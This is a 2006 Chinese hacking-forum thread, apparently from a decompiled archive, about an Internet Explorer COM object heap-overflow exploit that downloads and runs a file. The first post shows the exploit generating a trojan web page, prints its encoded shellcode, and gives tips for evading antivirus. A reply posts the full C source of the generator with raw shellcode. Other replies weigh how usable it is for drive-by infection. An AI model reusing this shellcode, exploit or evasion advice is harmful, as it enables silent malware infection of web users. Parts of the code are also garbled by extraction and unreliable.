06014之后的又一匹烈马(IECOMObjectRemoteHeapOverflow)
[原创]06014之后的又一匹烈马(IECOMObjectRemoteHeapOverflow)
文章标题:[原创]06014之后的又一匹烈马(IECOMObjectRemoteHeapOverflow)顶部 风尘浪子 发布于:2006-09-1721:07 [楼主][原创]06014之后的又一匹烈马(IECOMObjectRemoteHeapOverflow)
文章作者:风尘浪子
信息来源:邪恶八进制信息安全团队(https://www.wendangku.net/doc/0617859667.html,)
06014之后的一匹烈马---InternetExplorerCOMObjectRemoteHeapOverflowDownloadExecExploit
06014出来之后,网络上掀起挂马狂潮,象我这样天天在网上混的人,如果不打补丁,一天至少中马10此。今天星期天,不用上班了,时间真难得啊!到网上转转,突然在一exploit发布网站上发现了
InternetExplorerCOMObjectHeapOverflowDownloadExecExploit
*!!!0day!!!PublicVersion!!!
实用系统:
Windows2000ServerSP4CN
+InternetExplorer6.0SP1
WindowsXPSP2CN
+InternetExplorer6.0SP1(Youneedsomegoodluck!:-)
还挺爽吧,赶紧编译源代码(见附件rar),运行测试。
以下是测试过程:
(注:我的http://127.0.0.1/fy.exe是把netuserfy/add保存为bat,再做成自解压fy.exe,注,我的系统是xp2,前天打的补丁。测试结果是fy.exe可以运行,但是不太稳定,耗内存,而且运行一次之后会出现如下图所示内存不能为read错误,不知道是不是我机器原因。生成的网马大家自己做免杀,00h混淆对付文件查杀,拆分关键字对付内存查杀。相信这个马有很大的利用价值!hoho!)
以下是测试结果:
Copycode
MicrosoftWindowsXP[版本5.1.2600]
(C)版权所有1985-2001MicrosoftCorp.
C:\DocumentsandSettings\new>netuser
\\HACK的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET flyaway
fy Guest HelpAssistant
new SUPPORT_388945a0
命令成功完成。
C:\DocumentsandSettings\new>netuserfy/del
命令成功完成。
C:\DocumentsandSettings\new>netuser
\\HACK的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET flyaway
Guest HelpAssistant new
SUPPORT_388945a0
命令成功完成。
C:\DocumentsandSettings\new>14
'14'不是内部或外部命令,也不是可运行的程序
或批处理文件。
C:\DocumentsandSettings\new>fy
InternetExplorerCOMObjectRemoteHeapOverflowDownloadExecExploit
Codebynopnop#https://www.wendangku.net/doc/0617859667.html,,编译by风尘浪子[E.S.T]QQ:156544632
!!!MYBlog:[url]https://www.wendangku.net/doc/0617859667.html,/flyaway[/url]
Usage:fy
C:\DocumentsandSettings\new>fy[url]http://127.0.0.1/fy.exe[/url]
[+]downloadurl:[url]http://127.0.0.1/fy.exe[/url]
[+]exploitfile:flyaway.htm
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c"
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000"
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516"
"%u2ee8%u0
000%u8300%u20ec%udc8b%u206a%uff53%u0456"
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300"
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856"
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56"
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be"
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775"
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd"
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e"
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a"
"%u6870%u7474%u3a70%u2f2f%u3231%u2e37%u2e30%u2e30"
"%u2f31%u7966%u652e%u6578%u0000";
[+]exploitwritetoflyaway.htmsuccess!
C:\DocumentsandSettings\new>netuser //运行之后
\\HACK的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET flyaway
fy Guest HelpAssistant
new SUPPORT_388945a0
命令成功完成。
C:\DocumentsandSettings\new>
看到了吧,还有效果吧。欢迎大家讨论并做深入研究!闪!
=800)window.open('https://www.wendangku.net/doc/0617859667.html,/attachment/Mon_0609/10_10717_c0ec7b72c50c555.jpg');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">
[此贴被风尘浪子在2006-09-1817:30重新编辑]
附件:fy.rar(27K)下载次数:215顶部 zhuwg 发布于:2006-09-1723:00 [1楼]
代码如下,大家来优化下,去掉异常
争取超过06014
Copycode
/*
*-----------------------------------------------------------------------
*
*daxctle2.c-InternetExplorerCOMObjectHeapOverflowDownloadExecExploit
*!!!0day!!!PublicVersion!!!
*
*Copyright(C)2006XSecAllRightsReserved.
*
*Author :nop
* :nop#https://www.wendangku.net/doc/0617859667.html,
* :[url]https://www.wendangku.net/doc/0617859667.html,[/url]
* :
*Tested :Windows2000ServerSP4CN
* : +InternetExplorer6.0SP1
* :WindowsXPSP2CN
* : +InternetExplorer6.0SP1(Youneedsomegoodluck!:-)
* :
*Complie:cldaxctle2.c
* :
*Usage :d:\>daxctle2
* :
* :Usage:daxctle
* :
* :d:\>daxctle2[url]https://www.wendangku.net/doc/0617859667.html,/xxx.exe[/url]xxx.htm
* :
*
*------------------------------------------------------------------------
*/
#include
#include
FILE*fp=NULL;
char*file="xsec.htm";
char*url=NULL;
//DownloadExecShellcodebynop
unsignedcharsc[]=
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04"
"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33"
"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08"
"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b"
"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10"
"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7"
"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b"
"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x
8e\x4e\x0e"
"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f"
"\x70";
char*header=
"\n"
"
"
"\n"
"\n"
"\n"
"\n"
"\n";
//printunicodeshellcode
voidPrintUc(char*lpBuff,intbuffsize)
{
inti,j;
char*p;
charmsg[4];
for(i=0;i
if((i%16)==0)
{
if(i!=0)
{
printf("\"\n\"");
fprintf(fp,"%s","\"+\n\"");
}
else
{
printf("\"");
fprintf(fp,"%s","\"");
}
}
printf("%%u%0.4x",((unsignedshort*)lpBuff)[i/2]);
fprintf(fp,"%%u%0.4x",((unsignedshort*)lpBuff)[i/2]);
}
printf("\";\n");
fprintf(fp,"%s","\");\n");
fflush(fp);
}
voidmain(intargc,char**argv)
{
unsignedcharbuf[1024]={0};
intsc_len=0;
if(argc<2)
{
printf("InternetExplorerCOMObjectRemoteHeapOverflowDownloadExecExploit\n");
printf("Codebynopnop#https://www.wendangku.net/doc/0617859667.html,,Welcometo[url]https://www.wendangku.net/doc/0617859667.html,[/url]\n");
//printf("!!!0Day!!!PleaseKeepPrivate!!!\n");
printf("\r\nUsage:%s
exit(1);
}
url=argv[1];
//if((!strstr(url,"http://")&!strstr(url,"ftp://"))||strlen(url)<10||strlen(url)>60)
if((!strstr(url,"http://")&!strstr(url,"ftp://"))||strlen(url)<10)
{
//printf("[-]Invalidurl.Muststartwith'http://','ftp://'and<60bytes.\n");
printf("[-]Invalidurl.Muststartwith'http://','ftp://'\n");
return;
}
printf("[+]downloadurl:%s\n",url);
if(argc>=3)file=argv[2];
printf("[+]exploitfile:%s\n",file);
fp=fopen(file,"w");
if(!fp)
{
printf("[-]Openfileerror!\n");
return;
}
//printhtmlheader
fprintf(fp,"%s",header);
fflush(fp);
//printshellcode
memset(buf,0,sizeof(buf));
sc_len=sizeof(sc)-1;
memcpy(buf,sc,sc_len);
memcpy(buf+sc_len,url,strlen(url));
sc_len+=strlen(url)+1;
PrintUc(buf,sc_len);
//printhtmlfooter
fprintf(fp,"%s",footer);
fflush(fp);
printf("[+]exploitwriteto%ssuccess!\n",file);
}
顶部 sgl 发布于:2006-09-1723:15 [2楼]
倒,lion好象没放出来吧,不知楼主是在哪弄的:)顶部 守护天使 发布于:2006-09-1723:23 [3楼]
呵呵,早就拿到了,测试了没成功,winxpsp2的机器,而且爆卡,不是挂马的理想选择,
个人认为还是06014实用。顶部 cnhcerkf 发布于:2006-09-1723:34 [4楼]
偶是13号看到的,测试了下本机,还有虚拟机(2003)IE卡死,内存出错,关闭。。OVER。放弃。顶部 sunwear 发布于:2006-09-1800:26 [5楼]
Quote:
这里是引用第[2楼]的sgl于2006-09-1723:15发表的:
倒,lion好象没放出来吧,不知楼主是在哪弄的:)
没看到是FATB的那个站发布的么
就是那个摸板跟cnhonker差不多的站。
前两天在安全焦点fatb就发过了顶部 杀虫剂 发布于:2006-09-1800:33 [6楼]
一个字卡。停了5-6分钟不得已关掉了。配置差的千万别试。顶部 sgl 发布于:2006-09-1808:32 [7楼]
Quote:
这里是引用第[5楼]的sunwear于2006-09-1800:26发表的:
没看到是FATB的那个站发布的么
就是那个摸板跟cnhonker差不多的站。
前两天在安全焦点fatb就发过了
https://www.wendangku.net/doc/0617859667.html,/
红客继续开放了.顶部 fhod 发布于:2006-09-1809:44 [8楼]
https://www.wendangku.net/doc/0617859667.html,/exploits/2358
这里有
估计多半是出自这里顶部 kon-bluesky 发布于:2006-09-1811:20 [9楼]
这个不是一般的卡.前几天有朋友发了一份过来.测试了一下.汗.恨不得把机器扔了.
把IE卡死为止.要是挂马的话.我看是要死人的.(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:https://www.wendangku.net/doc/0617859667.html,/